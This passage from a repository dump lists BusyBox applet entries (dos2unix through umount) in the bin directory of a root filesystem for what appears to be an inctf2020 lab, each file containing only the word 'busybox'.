busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/dos2unix: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/du: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/dumpkmap: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/dumpleases: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/echo: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ed: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/egrep: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/eject: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/env: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/envdir: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/envuidgid: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ether-wake: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/expand: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/expr: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/fakeidentd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/false: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/fbset: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/fbsplash: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/fdflush: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/fdformat: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/fdisk: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/fgconsole: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/fgrep: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/find: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/findfs: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/flock: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/fold: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/free: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/freeramdisk: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/fsck: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/fsck.minix: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/fsync: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ftpd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ftpget: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ftpput: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/fuser: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/getopt: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/getty: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/grep: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/groups: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/gunzip: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/gzip: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/halt: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/hd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/hdparm: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/head: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/hexdump: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/hostid: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/hostname: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/httpd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/hush: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/hwclock: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/id: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ifconfig: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ifdown: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ifenslave: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ifplugd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ifup: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/inetd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/init: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/insmod: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/install: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ionice: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/iostat: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ip: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ipaddr: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ipcalc: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ipcrm: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ipcs: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/iplink: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/iproute: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/iprule: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/iptunnel: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/kbd_mode: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/kill: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/killall: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/killall5: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/klogd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/last: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/less: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/linux32: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/linux64: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/linuxrc: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ln: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/loadfont: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/loadkmap: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/logger: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/login: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/logname: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/logread: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/losetup: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/lpd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/lpq: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/lpr: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ls: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/lsattr: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/lsmod: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/lsof: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/lspci: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/lsusb: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/lzcat: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/lzma: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/lzop: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/lzopcat: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/makedevs: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/makemime: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/man: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/md5sum: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mdev: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mesg: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/microcom: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mkdir: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mkdosfs: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mke2fs: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mkfifo: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mkfs.ext2: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mkfs.minix: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mkfs.vfat: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mknod: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mkpasswd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mkswap: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mktemp: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/modinfo: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/modprobe: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/more: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mount: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mountpoint: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mpstat: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mt: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/mv: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/nameif: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/nanddump: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/nandwrite: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/nbd-client: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/nc: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/netstat: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/nice: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/nmeter: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/nohup: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/nslookup: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ntpd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/od: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/openvt: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/passwd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/patch: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/pgrep: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/pidof: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ping: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ping6: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/pipe_progress: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/pivot_root: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/pkill: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/pmap: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/popmaildir: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/poweroff: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/powertop: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/printenv: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/printf: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ps: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/pscan: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/pstree: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/pwd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/pwdx: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/raidautorun: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/rdate: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/rdev: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/readahead: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/readlink: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/readprofile: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/realpath: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/reboot: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/reformime: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/remove-shell: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/renice: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/reset: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/resize: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/rev: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/rm: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/rmdir: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/rmmod: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/route: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/rpm: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/rpm2cpio: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/rtcwake: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/run-parts: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/runlevel: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/runsv: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/runsvdir: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/rx: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/script: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/scriptreplay: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/sed: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/sendmail: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/seq: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/setarch: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/setconsole: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/setfont: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/setkeycodes: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/setlogcons: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/setserial: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/setsid: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/setuidgid: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/sh: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/sha1sum: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/sha256sum: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/sha512sum: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/showkey: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/slattach: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/sleep: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/smemcap: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/softlimit: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/sort: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/split: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/start-stop-daemon: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/stat: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/strings: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/stty: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/su: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/sulogin: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/sum: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/sv: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/svlogd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/swapoff: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/swapon: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/switch_root: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/sync: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/sysctl: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/syslogd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/tac: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/tail: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/tar: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/tcpsvd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/tee: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/telnet: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/telnetd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/test: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/tftp: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/tftpd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/time: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/timeout: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/top: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/touch: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/tr: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/traceroute: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/traceroute6: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/true: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/tty: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/ttysize: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/tunctl: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/udhcpc: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/udhcpd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/udpsvd: -------------------------------------------------------------------------------- 1 | busybox -------------------------------------------------------------------------------- /inctf2020/Lab9/fs/bin/umount: 